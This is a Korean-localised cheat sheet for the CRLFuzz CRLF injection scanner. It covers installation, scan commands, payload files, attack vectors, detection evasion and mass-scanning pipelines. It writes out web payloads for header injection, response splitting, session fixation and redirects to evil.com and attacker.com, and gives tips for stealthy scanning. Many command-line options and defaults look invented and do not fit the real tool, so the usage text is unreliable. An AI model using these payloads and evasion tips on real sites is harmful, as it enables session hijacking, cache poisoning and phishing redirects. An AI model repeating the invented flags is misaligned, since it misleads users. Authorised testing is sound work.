CRLFuzz
Overview
섹션 제목: “Overview”CRLFuzz is a lightweight, fast CRLF (Carriage Return Line Feed) injection vulnerability scanner written in Go. It efficiently detects CRLF injection vulnerabilities across web applications by testing parameters and headers against multiple payloads. The tool is ideal for bug bounty hunters and penetration testers conducting security assessments on web applications.
Installation
섹션 제목: “Installation”Prerequisites
섹션 제목: “Prerequisites”- Go 1.11+ (for building from source)
- Or download precompiled binaries
From Source
섹션 제목: “From Source”git clone https://github.com/dwisiswant0/crlfuzz.git
cd crlfuzz
go build -o crlfuzzmacOS/Linux (Binary)
섹션 제목: “macOS/Linux (Binary)”wget https://github.com/dwisiswant0/crlfuzz/releases/download/v1.5.0/crlfuzz_1.5.0_linux_amd64.tar.gz
tar -xvf crlfuzz_1.5.0_linux_amd64.tar.gz
chmod +x crlfuzzHomebrew (macOS)
섹션 제목: “Homebrew (macOS)”brew install dwisiswant0/tap/crlfuzzWindows
섹션 제목: “Windows”Download .exe from releases: https://github.com/dwisiswant0/crlfuzz/releases
Basic Usage
섹션 제목: “Basic Usage”| Command | Description |
|---|---|
crlfuzz -u <url> | Scan single URL |
crlfuzz -l <file> | Scan URLs from file |
crlfuzz -u <url> -v | Verbose output |
crlfuzz --help | Show help menu |
crlfuzz -u <url> -c 10 | Set concurrency level |
Single URL Scanning
섹션 제목: “Single URL Scanning”Basic Scan
섹션 제목: “Basic Scan”crlfuzz -u 'http://example.com/?page=test'With Verbose Output
섹션 제목: “With Verbose Output”crlfuzz -u 'http://example.com/?page=test' -vShow Request/Response Details
섹션 제목: “Show Request/Response Details”crlfuzz -u 'http://example.com/?name=value' -v --show-req --show-respBatch Scanning
섹션 제목: “Batch Scanning”Scan Multiple URLs from File
섹션 제목: “Scan Multiple URLs from File”crlfuzz -l urls.txtCreate urls.txt:
http://example.com/?page=test
http://example.com/?user=admin
http://example.com/?id=123Scan All URLs with Verbose Mode
섹션 제목: “Scan All URLs with Verbose Mode”crlfuzz -l urls.txt -vOutput Results to File
섹션 제목: “Output Results to File”crlfuzz -l urls.txt -o results.txtConcurrency and Performance
섹션 제목: “Concurrency and Performance”Adjust Concurrency Level
섹션 제목: “Adjust Concurrency Level”crlfuzz -l urls.txt -c 25Default is 10 concurrent requests. Increase for larger scans.
Maximum Concurrency
섹션 제목: “Maximum Concurrency”crlfuzz -l urls.txt -c 100Use cautiously to avoid overwhelming target servers.
Timeout Configuration
섹션 제목: “Timeout Configuration”crlfuzz -u 'http://example.com/?test=value' -t 30Set timeout in seconds (default is 10 seconds).
Payload Configuration
섹션 제목: “Payload Configuration”Default Payloads
섹션 제목: “Default Payloads”CRLFuzz includes built-in CRLF injection payloads:
%0d%0a (URL-encoded CRLF)
%0d (CR only)
%0a (LF only)
\r\n (Raw CRLF)Custom Payload File
섹션 제목: “Custom Payload File”crlfuzz -u 'http://example.com/?page=test' -payloads custom-payloads.txtCreate custom-payloads.txt:
%0d%0a
%0d%0aSet-Cookie:admin=true
%0d%0aLocation:http://evil.com
%0d%0aX-Injected:valueTest Specific Injection Points
섹션 제목: “Test Specific Injection Points”crlfuzz -u 'http://example.com/?param=VALUE' -payloads payloads.txtCRLFuzz replaces VALUE with each payload.
Header Testing
섹션 제목: “Header Testing”Test Custom Headers
섹션 제목: “Test Custom Headers”crlfuzz -u 'http://example.com/' -H 'X-Forwarded-For: test' -vMultiple Custom Headers
섹션 제목: “Multiple Custom Headers”crlfuzz -u 'http://example.com/' -H 'User-Agent: test' -H 'X-Custom: value'Test All Headers
섹션 제목: “Test All Headers”crlfuzz -u 'http://example.com/?page=test' --test-headersParameter Fuzzing
섹션 제목: “Parameter Fuzzing”Scan All Parameters
섹션 제목: “Scan All Parameters”crlfuzz -u 'http://example.com/?page=test&user=admin&id=123'Automatically tests all parameters for CRLF injection.
Focus on Specific Parameter
섹션 제목: “Focus on Specific Parameter”crlfuzz -u 'http://example.com/?page=test' -param 'page'Exclude Parameters from Testing
섹션 제목: “Exclude Parameters from Testing”crlfuzz -u 'http://example.com/?page=test&id=123' -skip 'id'Output Formats
섹션 제목: “Output Formats”Default Text Output
섹션 제목: “Default Text Output”crlfuzz -u 'http://example.com/?test=value'Output shows:
- URL
- Vulnerable parameter
- Payload used
- Response status code
JSON Output
섹션 제목: “JSON Output”crlfuzz -l urls.txt -o results.json -jsonCSV Export
섹션 제목: “CSV Export”crlfuzz -l urls.txt -o results.csv -csvSuppress Output
섹션 제목: “Suppress Output”crlfuzz -l urls.txt -qQuiet mode - only shows results.
Proxy Configuration
섹션 제목: “Proxy Configuration”HTTP Proxy
섹션 제목: “HTTP Proxy”crlfuzz -u 'http://example.com/?test=value' -proxy http://127.0.0.1:8080SOCKS5 Proxy
섹션 제목: “SOCKS5 Proxy”crlfuzz -u 'http://example.com/?test=value' -socks5 127.0.0.1:1080Proxy with Authentication
섹션 제목: “Proxy with Authentication”crlfuzz -u 'http://example.com/?test=value' -proxy http://user:pass@127.0.0.1:8080SSL/TLS Options
섹션 제목: “SSL/TLS Options”Ignore SSL Certificate Errors
섹션 제목: “Ignore SSL Certificate Errors”crlfuzz -u 'https://example.com/?test=value' --insecureUse Custom CA Certificate
섹션 제목: “Use Custom CA Certificate”crlfuzz -u 'https://example.com/?test=value' --ca-cert /path/to/ca.crtHTTP Methods and Request Customization
섹션 제목: “HTTP Methods and Request Customization”Test POST Parameters
섹션 제목: “Test POST Parameters”crlfuzz -u 'http://example.com/' -method POST -data 'param=VALUE&user=test'PUT Request
섹션 제목: “PUT Request”crlfuzz -u 'http://example.com/api/resource' -method PUT -data 'field=VALUE'Custom Request Body
섹션 제목: “Custom Request Body”crlfuzz -u 'http://example.com/api' -method POST -data '{"key":"VALUE"}'Add Request Headers
섹션 제목: “Add Request Headers”crlfuzz -u 'http://example.com/?test=VALUE' -H 'Authorization: Bearer token' -H 'Content-Type: application/json'Response Analysis
섹션 제목: “Response Analysis”Show Response Headers
섹션 제목: “Show Response Headers”crlfuzz -u 'http://example.com/?test=value' -v --show-respShow Response Body
섹션 제목: “Show Response Body”crlfuzz -u 'http://example.com/?test=value' -v --show-bodyFilter by Status Code
섹션 제목: “Filter by Status Code”crlfuzz -l urls.txt --filter-status 200Only test URLs that return status 200.
Advanced Filtering
섹션 제목: “Advanced Filtering”Match Success by Response Content
섹션 제목: “Match Success by Response Content”crlfuzz -u 'http://example.com/?test=value' -match 'Set-Cookie'Consider vulnerability confirmed if response contains “Set-Cookie”.
Filter Responses Containing Text
섹션 제목: “Filter Responses Containing Text”crlfuzz -l urls.txt -match 'Location:' -o vulnerable.txtRate Limiting
섹션 제목: “Rate Limiting”Request Delay (Milliseconds)
섹션 제목: “Request Delay (Milliseconds)”crlfuzz -l urls.txt -delay 100Add 100ms delay between requests.
Requests Per Second
섹션 제목: “Requests Per Second”crlfuzz -l urls.txt -rate 10Limit to 10 requests per second.
Common Workflows
섹션 제목: “Common Workflows”Quick Vulnerability Scan
섹션 제목: “Quick Vulnerability Scan”crlfuzz -u 'http://example.com/?page=home&user=test'Comprehensive Bug Bounty Scan
섹션 제목: “Comprehensive Bug Bounty Scan”crlfuzz -l target-urls.txt -v --show-req --show-resp -o findings.txtStealth Scanning
섹션 제목: “Stealth Scanning”crlfuzz -l urls.txt -delay 500 -c 5 --insecureLarge-Scale Assessment
섹션 제목: “Large-Scale Assessment”crlfuzz -l thousands-of-urls.txt -c 50 -t 30 -json -o results.jsonCRLF Injection Attack Vectors
섹션 제목: “CRLF Injection Attack Vectors”Header Injection Attack
섹션 제목: “Header Injection Attack”Payload: %0d%0aSet-Cookie:admin=true
Result: Response header contains injected Set-CookieResponse Splitting
섹션 제목: “Response Splitting”Payload: %0d%0a%0d%0aHTTP/1.1 200 OK
Result: Ability to split HTTP responseSession Fixation
섹션 제목: “Session Fixation”Payload: %0d%0aSet-Cookie:SESSIONID=attacker-controlled
Result: Force victim session IDOpen Redirect via Headers
섹션 제목: “Open Redirect via Headers”Payload: %0d%0aLocation:http://evil.com
Result: Redirect user to malicious siteCache Poisoning
섹션 제목: “Cache Poisoning”Payload: %0d%0aX-Original-URL:/cache-buster
Result: Poison cached responsesUnderstanding CRLFuzz Output
섹션 제목: “Understanding CRLFuzz Output”Example Output
섹션 제목: “Example Output”[CRLF] http://example.com/?page=VALUE
[PARAMETER] page
[PAYLOAD] %0d%0aSet-Cookie:admin=true
[STATUS] 200
[FOUND] YesVulnerability Indicators
섹션 제목: “Vulnerability Indicators”- Status code change after injection
- Additional headers in response
- Response splitting evidence
- Cookie manipulation detection
Detection Evasion
섹션 제목: “Detection Evasion”Randomize User-Agent
섹션 제목: “Randomize User-Agent”crlfuzz -u 'http://example.com/?test=value' -H 'User-Agent: Mozilla/5.0 (random)'Vary Request Patterns
섹션 제목: “Vary Request Patterns”crlfuzz -l urls.txt -delay 500 -c 3Rotate Through Payloads
섹션 제목: “Rotate Through Payloads”crlfuzz -u 'http://example.com/?test=value' -payloads rotating-payloads.txtTroubleshooting
섹션 제목: “Troubleshooting”Connection Timeout
섹션 제목: “Connection Timeout”crlfuzz -u 'http://slow-server.com/?test=value' -t 60Increase timeout to 60 seconds.
Too Many Errors
섹션 제목: “Too Many Errors”crlfuzz -l urls.txt -c 5 -t 30Reduce concurrency and increase timeout.
SSL Certificate Issues
섹션 제목: “SSL Certificate Issues”crlfuzz -u 'https://example.com/?test=value' --insecureBypass SSL verification.
Not Finding Vulnerabilities
섹션 제목: “Not Finding Vulnerabilities”crlfuzz -u 'http://example.com/?test=value' -payloads extended-payloads.txt -vTry with custom payloads and verbose mode.
Best Practices
섹션 제목: “Best Practices”- Obtain authorization before scanning production systems
- Start with low concurrency and increase gradually
- Use appropriate timeouts for slow servers
- Test parameters individually for precise results
- Review all findings carefully for false positives
- Combine with other scanners for comprehensive testing
- Keep tool updated for latest payload detection
Payload Examples
섹션 제목: “Payload Examples”Basic CRLF
섹션 제목: “Basic CRLF”%0d%0aHeader Injection
섹션 제목: “Header Injection”%0d%0aX-Injected-Header:valueCookie Injection
섹션 제목: “Cookie Injection”%0d%0aSet-Cookie:name=valueLocation Redirect
섹션 제목: “Location Redirect”%0d%0aLocation:http://attacker.comIntegration with Other Tools
섹션 제목: “Integration with Other Tools”Pipe URLs from httpx
섹션 제목: “Pipe URLs from httpx”httpx -l domains.txt | crlfuzz -With Wayback Machine URLs
섹션 제목: “With Wayback Machine URLs”waybackurls example.com | crlfuzz -Combine with Parameter Fuzzer
섹션 제목: “Combine with Parameter Fuzzer”ffuf -w params.txt -u 'http://example.com/?FUZZ=test' | crlfuzz -Performance Tips
섹션 제목: “Performance Tips”- Increase concurrency for large URL lists
- Use shorter timeouts for quick scans
- Test parameters in separate scans if needed
- Monitor CPU and network usage
- Use filtering to reduce false positives
Legal Considerations
섹션 제목: “Legal Considerations”CRLFuzz is for authorized security testing only. Always obtain explicit written permission before testing any system. Unauthorized access and scanning is illegal.
Resources
섹션 제목: “Resources”- GitHub: https://github.com/dwisiswant0/crlfuzz
- CRLF Injection Guide: https://owasp.org/
- Bug Bounty Resources: https://hackerone.com/
- Community: Active GitHub discussions and issues